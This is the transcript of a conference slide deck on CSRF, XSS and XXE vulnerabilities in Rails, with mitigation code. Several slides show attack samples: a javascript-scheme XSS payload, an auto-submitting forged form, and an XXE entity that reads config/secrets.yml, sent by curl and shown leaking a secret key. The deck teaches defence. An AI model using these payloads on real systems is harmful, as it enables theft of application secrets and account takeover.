$30 off During Our Annual Pro Sale. View Details »

Security is Broken: Understanding Common Vulnerabilities

Security is Broken: Understanding Common Vulnerabilities

Mountain West Ruby Conference

Eileen M. Uchitelle

March 21, 2016
Tweet

More Decks by Eileen M. Uchitelle

Other Decks in Technology

Transcript

  1. SECURITY IS BROKEN
    Understanding Common Vulnerabilities

    View Slide

  2. EILEEN M UCHITELLE
    Security, Performance, & Infrastructure
    at Basecamp
    ! eileencodes.com
    " @eileencodes
    # @eileencodes
    ! speakerdeck.com/eileencodes

    View Slide

  3. View Slide

  4. View Slide

  5. OPEN SOURCE
    Rails Committers
    Rails Security

    View Slide

  6. View Slide

  7. View Slide

  8. How is security
    broken?

    View Slide

  9. • Impossible to test for all possible
    vulnerabilities
    How is security broken?

    View Slide

  10. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    How is security broken?

    View Slide

  11. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    • Patching one vulnerability can lead to
    exposing new ones
    How is security broken?

    View Slide

  12. How did we get
    here?

    View Slide

  13. • Failed to enforce web standards
    How did we get here?

    View Slide

  14. vs.

    View Slide

  15. View Slide

  16. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    How did we get here?

    View Slide

  17. ...completely failed to come up with
    even the most rudimentary usable
    frameworks for understanding the
    security of modern software.
    – Michal Zalewski, The Tangled Web

    View Slide

  18. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    • Too few people understand the
    vulnerabilities
    How did we get here?

    View Slide

  19. View Slide

  20. CSRF

    View Slide

  21. CSRF
    Cross-Site Request Forgery

    View Slide

  22. EXPLOITING CSRF

    View Slide

  23. View Slide


  24. Name

    Email

    Website



    View Slide

  25. View Slide

  26. Looks the same, different URL

    View Slide



  27. Name

    Email

    Website




    View Slide


  28. Name

    Email

    Website



    Attackers email

    View Slide



  29. Name

    Email

    Website




    Auto-submit form

    View Slide



  30. Name

    Email

    Website




    Auto-submit form
    to victim site

    View Slide

  31. Attacker’s email

    View Slide

  32. How dangerous are
    CSRF attacks?

    View Slide

  33. How to mitigate
    CSRF?

    View Slide

  34. • Use built-in framework CSRF protection
    How to mitigate CSRF?

    View Slide

  35. View Slide

  36. class ApplicationController < ActionController::Base
    protect_from_forgery with: :exception
    end

    View Slide


  37. name=authenticity_token" />
    Name

    Email

    Website



    CSRF protection

    View Slide

  38. Caveat:
    CSRF protection in Rails is
    order-dependent

    View Slide

  39. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end

    View Slide

  40. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class OtherController < ApplicationController
    skip_before_action :authenticate
    before_action :authenticate_method, only: :create
    end

    View Slide

  41. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class OtherController < ActionController::Base
    skip_before_action :authenticate
    before_action :authenticate_method, only: :create
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end

    View Slide

  42. View Slide

  43. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    How to mitigate CSRF?

    View Slide

  44. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t
    reuse tokens
    How to mitigate CSRF?

    View Slide

  45. class SessionsController < ApplicationController
    def destroy
    sign_out
    reset_session
    redirect_to sign_in_url
    end
    end
    Refreshes
    Authenticity Token

    View Slide

  46. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t
    reuse tokens
    • Mitigate XSS attacks
    How to mitigate CSRF?

    View Slide

  47. XSS

    View Slide

  48. XSS
    Cross-Site Scripting

    View Slide

  49. EXPLOITING STORED
    XSS

    View Slide

  50. View Slide

  51. View Slide

  52. Escaped HTML

    View Slide

  53. Profile
    <%= notice %>

    Name:
    <%= @user.name %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

    View Slide

  54. Profile
    <%= notice %>

    Name:
    <%= (@user.name).html_safe %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

    View Slide

  55. Unescaped HTML

    View Slide

  56. JavaScript Scheme

    View Slide

  57. View Slide

  58. javascript://example.com/%0Aalert(1)

    View Slide

  59. example.com/%0Aalert(1)
    JavaScript Scheme
    javascript://

    View Slide

  60. javascript://example.com/%0Aalert(1)
    URL
    example.com

    View Slide

  61. Percent encoded “line feed”
    javascript://example.com/%0Aalert(1)
    %0A

    View Slide

  62. JavaScript Alert
    javascript://example.com/%0Aalert(1)
    alert(1)

    View Slide

  63. How dangerous are
    XSS attacks?

    View Slide

  64. How to mitigate
    XSS?

    View Slide

  65. • Always escape user-provided data
    How to mitigate XSS?

    View Slide

  66. Profile
    <%= notice %>

    Name:
    <%= (@user.name).html_safe %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Don’t do this

    View Slide

  67. View Slide

  68. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    How to mitigate XSS?

    View Slide

  69. Profile
    <%= notice %>

    Name:
    <%= sanitize(@user.name) %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Will strip out unwanted
    tags and attributes

    View Slide

  70. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    • Validate user-provided data
    How to mitigate XSS?

    View Slide

  71. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  72. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  73. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  74. XXE

    View Slide

  75. XXE
    XML eXternal Entity Attack

    View Slide



  76. ]>

    Groceries
    Take Arya to the vet
    &ext1;
    Pick up beer
    Get car oil changed

    View Slide



  77. ]>

    Groceries
    Take Arya to the vet
    &ext1;
    Pick up beer
    Get car oil changed

    Entity reference

    View Slide


  78. Book flight to Salt Lake City
    Finish Security is Broken Talk

    View Slide



  79. Groceries
    Take Arya to the vet
    Book flight to Salt Lake City
    Finish Security is Broken Talk
    Pick up beer
    Get car oil changed

    View Slide

  80. EXPLOITING XXE
    with cURL

    View Slide

  81. class UsersController < ApplicationController
    def create
    @user = User.new(user_params)
    respond_to do |format|
    if @user.save
    format.html { redirect_to @user }
    format.xml { render :xml => @user.to_xml }
    else
    format.html { render :new }
    format.xml { render xml: @user.errors.to_xml }
    end
    end
    end
    end

    View Slide

  82. class UsersController < ApplicationController
    def create
    @user = User.new(user_params)
    respond_to do |format|
    if @user.save
    format.html { redirect_to @user }
    format.xml { render :xml => @user.to_xml }
    else
    format.html { render :new }
    format.xml { render xml: @user.errors.to_xml }
    end
    end
    end
    end
    XML

    View Slide

  83. config/secrets.yml">
    ]>

    &name;

    View Slide

  84. config/secrets.yml">
    ]>

    &name;

    Requested file

    View Slide

  85. config/secrets.yml">
    ]>

    &name;

    Entity

    View Slide

  86. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://vulnerablesite.com/users.xml
    POST request to
    users create

    View Slide

  87. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://vulnerablesite.com/users.xml
    Payload

    View Slide

  88. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://vulnerablesite.com/users.xml


    ...
    production:
    secret_key_base:
    271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5
    f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40
    00e166a9a5
    ...


    User’s Name

    View Slide

  89. View Slide

  90. How dangerous are
    XXE attacks?

    View Slide

  91. View Slide

  92. How to mitigate
    XXE?

    View Slide

  93. • Don’t parse XML
    How to mitigate XXE?

    View Slide

  94. Don’t parse XML

    View Slide

  95. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    How to mitigate XXE?

    View Slide

  96. >> LibXML::XML.default_substitute_entities
    >> true

    View Slide

  97. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    • Whitelist known entities
    How to mitigate XXE?

    View Slide

  98. Investigate vulnerabilities & patches
    SECURITY

    View Slide

  99. owasp.org

    View Slide

  100. Resilience & empowerment
    SECURITY

    View Slide

  101. View Slide

  102. GitHub

    eileencodes/security_examples

    View Slide

  103. Awareness of vulnerabilities
    SECURITY

    View Slide

  104. View Slide

  105. To the future

    View Slide

  106. EILEEN M UCHITELLE
    Security, Performance, & Infrastructure
    at Basecamp
    ! eileencodes.com
    " @eileencodes
    # @eileencodes
    ! speakerdeck.com/eileencodes

    View Slide